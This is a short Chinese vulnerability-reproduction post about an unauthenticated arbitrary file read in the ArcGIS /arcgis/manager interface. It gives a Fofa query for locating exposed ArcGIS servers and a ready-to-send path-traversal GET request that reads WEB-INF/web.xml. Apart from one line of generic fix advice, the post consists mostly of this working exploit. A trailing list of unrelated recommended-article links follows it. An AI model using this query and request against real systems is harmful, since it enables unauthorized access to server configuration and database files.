ArcGIS地理空间平台 manager 任意文件读取漏洞复现

0x01 产品描述:

ArcGIS ‌是一个综合的地理空间平台,由Esri开发,旨在为专业人士和组织提供全面的地理信息系统(GIS)功能。ArcGIS通过集成和连接地理环境中的数据,支持创建、管理、分析、映射和共享各种类型的数据,从而帮助组织在决策制定中占据领先地位‌。
0x02 漏洞描述:

ArcGIS地理空间平台 /arcgis/manager接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 搜索语句:

Fofa:app="esri-ArcGIS"


0x04 漏洞复现:

GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
Host: your-ip


0x05 修复建议:

在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。

相关推荐
黑客KKKing27 分钟前
网络安全词汇
网络·算法·安全·web安全
燕雀安知鸿鹄之志哉.1 小时前
jdk21下载、安装(Windows、Linux、macOS)
网络·安全·web安全·网络安全·系统安全
m0_738322541 小时前
seacmsv9注入管理员账号密码+orderby+limit
安全·web安全
m0_742566603 小时前
渗透第二次作业
安全
东锋1.34 小时前
深入了解 NAT 模式:网络地址转换的奥秘
服务器·网络·安全
qq_448941085 小时前
12、k8s安全机制
安全·kubernetes
SZxdndz6 小时前
锂电池保护板测试仪:电池安全的守护者与创新驱动力
安全·能源
程序员果子7 小时前
掌控网络安全,尽在 Linux 动态防火墙:firewalld 常用命令
linux·服务器·网络·安全
SRC_BLUE_178 小时前
[Web 安全] 反序列化漏洞 - 学习笔记
笔记·学习·安全·网络安全